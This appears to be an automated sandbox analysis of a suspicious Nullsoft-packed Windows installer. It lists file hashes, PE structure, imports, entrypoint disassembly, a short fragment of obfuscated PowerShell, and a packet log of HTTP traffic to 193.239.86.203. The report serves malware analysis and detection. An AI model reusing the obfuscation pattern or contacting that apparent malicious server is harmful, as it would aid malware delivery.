Preview:	$Hyperleucocytoticesiddelsers=$Hyperleucocytoticreadwinners;<#Erythroderma Gitterpunkternes Accelerograph Indrmmer Archie Empiri Whitestraits #><#Svingbro noncandescently Dietitians #><#Baggrundsfarvens Dendritical Oophorectomizing Playboyen #><#udbulinger Toponymous Omsadles Supereconomy #><#Bassisterne Antitarnish Funktionslinierne Decore Spreeing Anachronist Nadver #><#Gallowglass Approbations uva Pentyne #><#Phenobarbitone Regeringsformers Destructively Kantele Missaying Sympolity Tho #><#Decimeteren Hjremargener Wreckages Impoison Fanebreredernes Fldeboller Delefilteret #><#stemmebaandslidelse Patrices Anerkendes Subaerating Cinchonin #><#Hosiomartyr Succesrigere Nuncupative Addenders Phials Snite #><#Revisionsinstitut Ubestrideligt Wearingly skjaldedigtets Feinschmeckeren #><#Venstrekrsel Rabblelike Mnstringer Briter Repaganizes Aleutite #><#terminerede Lagerbeholdningernes Dedicators Smittebrers Skrat #><#Afvigelsens Sandhis Conservable Tabulere Pauperizes Delegationsbesget Kaem

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ojk5wowp.0uc.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_orrq3qcc.xgx.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	6.8128663964483165
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Q20240425 MAX5073626.com.exe
File size:	794'761 bytes
MD5:	1c089552c29f12843d8cd8e2bbf5cf5b
SHA1:	6f3e611fc7d7d5938b99575bcd96366d6e213eab
SHA256:	76dbfa281b158a18c83d08a907f087b7330da28bdd2298eb9ee2f23c1df40491
SHA512:	3f6220ce4196ea9ec13ef699a8b8e51e8a7d5035511f8b252230bcc024e423610d5474587030f68dbfc5193bd02402975b6f71e9e352fd17453519748ab3a885
SSDEEP:	12288:K0Z4SNwhFaoncbHNsyBNzjdsO8aIaLJtBT7bbQ4:J4SO/wbtsQ9jdsFaxl3bbT
TLSH:	3FF4AF6966481FF2DC3545B5B02F05682A407CF697A0258937E9BB1ADD3E3620F0BF1E
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?.#!{}Mr{}Mr{}Mr0.Isy}Mr0.Ksz}Mr0.Lst}Mr{}Lr.}Mr..Isp}Mr...rz}Mr..Osz}MrRich{}Mr........................PE..L...j.}d...........

File Icon


Icon Hash:	363bec6777792f96

Static PE Info

General

Entrypoint:	0x4036d7
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x647DB76A [Mon Jun 5 10:22:34 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	66fcdd6338ffed276966867e7cf86116

Entrypoint Preview

Instruction
sub esp, 000003ECh
push ebx
push ebp
push esi
push edi
xor ebx, ebx
mov edi, 00408520h
push 00008001h
mov dword ptr [esp+14h], ebx
mov ebp, ebx
call dword ptr [0040816Ch]
mov esi, dword ptr [004080A8h]
lea eax, dword ptr [esp+2Ch]
xorps xmm0, xmm0
mov dword ptr [esp+40h], ebx
push eax
movlpd qword ptr [esp+00000144h], xmm0
mov dword ptr [esp+30h], 0000011Ch
call esi
test eax, eax
jne 00007F7EC06945E9h
lea eax, dword ptr [esp+2Ch]
mov dword ptr [esp+2Ch], 00000114h
push eax
call esi
push 00000053h
pop eax
mov dl, 04h
mov byte ptr [esp+00000146h], dl
cmp word ptr [esp+40h], ax
jne 00007F7EC06945C3h
mov eax, dword ptr [esp+5Ah]
add eax, FFFFFFD0h
mov word ptr [esp+00000140h], ax
jmp 00007F7EC06945BDh
xor eax, eax
jmp 00007F7EC06945A4h
mov dl, byte ptr [esp+00000146h]
cmp dword ptr [esp+30h], 0Ah
jnc 00007F7EC06945BDh
movzx eax, word ptr [esp+38h]
mov dword ptr [esp+38h], eax
jmp 00007F7EC06945B6h
mov eax, dword ptr [esp+38h]
mov dword ptr [00429618h], eax
movzx eax, byte ptr [esp+30h]
shl ax, 0008h
movzx ecx, ax
movzx eax, byte ptr [esp+34h]
or ecx, eax
movzx eax, byte ptr [esp+00000140h]
shl ax, 0008h
shl ecx, 10h
movzx eax, word ptr [eax]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x89f0	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x51000	0x5a758	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2a8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6cbc	0x6e00	5b411ce50698b836f7f381f255acfda3	False	0.6487926136363636	data	6.362047879428468	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x184c	0x1a00	a12a6ad5a12c1c1014103d5a3ad82c3e	False	0.4260817307692308	zlib compressed data	4.837263923536209	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x1f620	0x200	169f1b2d62bddf5ac4c33f229d8a6383	False	0.232421875	data	1.714042829360118	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2a000	0x27000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x51000	0x5a758	0x5a800	2bdd97cbc777391a626d43085bde835e	False	0.15502525034530387	data	4.6552784761352335	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x51358	0x42028	Device independent bitmap graphic, 256 x 512 x 32, image size 270336	English	United States	0.112025475633932
RT_ICON	0x93380	0x12428	Device independent bitmap graphic, 256 x 512 x 8, image size 65536, 256 important colors	English	United States	0.20847149427746284
RT_ICON	0xa57a8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.4521784232365145
RT_ICON	0xa7d50	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.5143058161350844
RT_ICON	0xa8df8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.40538379530916846
RT_ICON	0xa9ca0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.4043321299638989
RT_ICON	0xaa548	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.3388728323699422
RT_ICON	0xaaab0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.650709219858156
RT_DIALOG	0xaaf18	0x120	data	English	United States	0.5138888888888888
RT_DIALOG	0xab038	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0xab158	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0xab220	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0xab280	0x76	Targa image data - Map 8 x 9256 x 1 +1	English	United States	0.6440677966101694
RT_VERSION	0xab2f8	0x110	0420 Alliant virtual executable common library not stripped	English	United States	0.5992647058823529
RT_MANIFEST	0xab408	0x349	XML 1.0 document, ASCII text, with very long lines (841), with no line terminators	English	United States	0.5552913198573127

Imports

DLL	Import
ADVAPI32.dll	RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegEnumKeyW, RegEnumValueW, RegQueryValueExW, RegSetValueExW, OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegCreateKeyExW, RegOpenKeyExW
SHELL32.dll	SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteExW
ole32.dll	OleInitialize, OleUninitialize, CoTaskMemFree, IIDFromString, CoCreateInstance
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll	PeekMessageW, DispatchMessageW, wsprintfA, LoadCursorW, SetClassLongW, GetWindowLongW, GetSysColor, ScreenToClient, SetCursor, GetWindowRect, TrackPopupMenu, AppendMenuW, EnableMenuItem, CreatePopupMenu, GetSystemMenu, GetSystemMetrics, IsWindowEnabled, EmptyClipboard, SetClipboardData, CloseClipboard, OpenClipboard, CheckDlgButton, EndDialog, DialogBoxParamW, IsWindowVisible, SetWindowPos, CreateWindowExW, GetClassInfoW, SetDlgItemTextW, CallWindowProcW, GetMessagePos, CharNextW, ExitWindowsEx, SetWindowTextW, SetTimer, CreateDialogParamW, DestroyWindow, LoadImageW, FindWindowExW, SetWindowLongW, InvalidateRect, ReleaseDC, GetDC, SetForegroundWindow, EnableWindow, GetDlgItem, ShowWindow, IsWindow, PostQuitMessage, SendMessageTimeoutW, SendMessageW, wsprintfW, FillRect, GetClientRect, EndPaint, BeginPaint, DrawTextW, DefWindowProcW, GetDlgItemTextW, CharNextA, CharPrevW, RegisterClassW, MessageBoxIndirectW, SystemParametersInfoW
GDI32.dll	GetDeviceCaps, SetBkColor, CreateBrushIndirect, SetTextColor, SetBkMode, SelectObject, DeleteObject, CreateFontIndirectW
KERNEL32.dll	GetLastError, WaitForSingleObject, GetExitCodeProcess, RemoveDirectoryW, GetTempFileNameW, CreateFileW, CreateDirectoryW, WideCharToMultiByte, lstrlenW, lstrcpynW, GlobalLock, GlobalUnlock, CreateThread, GetDiskFreeSpaceW, CopyFileW, GetVersionExW, GetWindowsDirectoryW, ExitProcess, GetCurrentProcess, CreateProcessW, GetTempPathW, SetEnvironmentVariableW, GetCommandLineW, GetModuleFileNameW, GetTickCount, GetFileSize, MultiByteToWideChar, MoveFileW, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, lstrcmpiW, lstrcmpW, MulDiv, GlobalFree, GlobalAlloc, LoadLibraryExW, GetModuleHandleW, FreeLibrary, Sleep, CloseHandle, SetFileTime, SetFilePointer, SetFileAttributesW, ReadFile, GetShortPathNameW, GetFullPathNameW, GetFileAttributesW, FindNextFileW, FindFirstFileW, FindClose, DeleteFileW, CompareFileTime, SearchPathW, SetCurrentDirectoryW, ExpandEnvironmentStringsW, WriteFile, GetSystemDirectoryW, MoveFileExW, GetModuleHandleA, GetProcAddress, lstrcmpiA, lstrcpyA, lstrcatW, SetErrorMode

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 25, 2024 21:36:46.500327110 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:46.811934948 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:46.812112093 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:46.812903881 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:47.124973059 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:47.125024080 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:47.125066042 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:47.125117064 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:47.125145912 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:47.125152111 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:47.125216961 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:47.436629057 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:47.436671972 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:47.436722994 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:47.436726093 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:47.436753035 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:47.436767101 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:47.436775923 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:47.436806917 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:47.436821938 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:47.436846972 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:47.436857939 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:47.436886072 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:47.436901093 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:47.436923981 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:47.436938047 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:47.436959028 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:47.436974049 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:47.749578953 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:47.749624968 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:47.749679089 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:47.749707937 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:47.749737024 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:47.749751091 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:47.749751091 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:47.749774933 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:47.749806881 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:47.749814034 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:47.749864101 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:47.749891043 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:47.749953032 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:47.750030994 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:47.750088930 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:47.750089884 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:47.750128984 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:47.750144005 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:47.750184059 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:47.750328064 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:47.750366926 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:47.750394106 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:47.750405073 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:47.750417948 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:47.750443935 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:47.750451088 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:47.750498056 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:47.750629902 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:47.750679016 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:47.750776052 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:47.750816107 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:47.750833988 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:47.750849962 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:47.750871897 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.061158895 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.061203003 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.061245918 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.061274052 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.061288118 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.061326027 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.061358929 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.061420918 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.061434031 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.061499119 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.061507940 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.061547995 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.061568975 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.061598063 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.061604023 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.061640024 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.061664104 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.061681032 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.061721087 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.061744928 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.061758041 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.061781883 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.061805010 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.061835051 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.061873913 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.061894894 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.061928034 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.061966896 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.062005997 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.062038898 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.062038898 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.062038898 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.062078953 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.062079906 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.062133074 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.062134027 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.062169075 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.062186956 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.062243938 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.062300920 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.062365055 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.062434912 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.062436104 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.062473059 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.062488079 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.062521935 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.062546015 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.062585115 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.062597990 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.062623978 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.062633991 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.062661886 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.062676907 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.062724113 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.062730074 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.062768936 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.062820911 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.062840939 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.062875032 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.062896967 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.062912941 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.062952042 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.062963963 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.062988997 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.063004017 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.063028097 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.063044071 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.063060999 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.063076019 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.372482061 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.372523069 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.372562885 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.372601986 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.372615099 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.372670889 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.372709990 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.372711897 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.372745037 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.372808933 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.372826099 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.372864008 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.372898102 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.372934103 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.373078108 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.373119116 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.373152018 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.373157978 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.373224020 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.373492956 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.373531103 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.373568058 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.373591900 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.373647928 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.373667002 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.373722076 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.373771906 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.373795033 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.373828888 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.373866081 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.373873949 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.373939991 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.373986959 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.374012947 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.374052048 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.374087095 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.374123096 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.374159098 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.374258995 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.374322891 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.374357939 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.374427080 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.374428988 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.374525070 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.374617100 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.374649048 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.374696016 CEST	49735	80	192.168.2.4	193.239.86.203
Apr 25, 2024 21:36:48.374866962 CEST	80	49735	193.239.86.203	192.168.2.4
Apr 25, 2024 21:36:48.374913931 CEST	80	49735	193.239.86.203	192.168.2.4
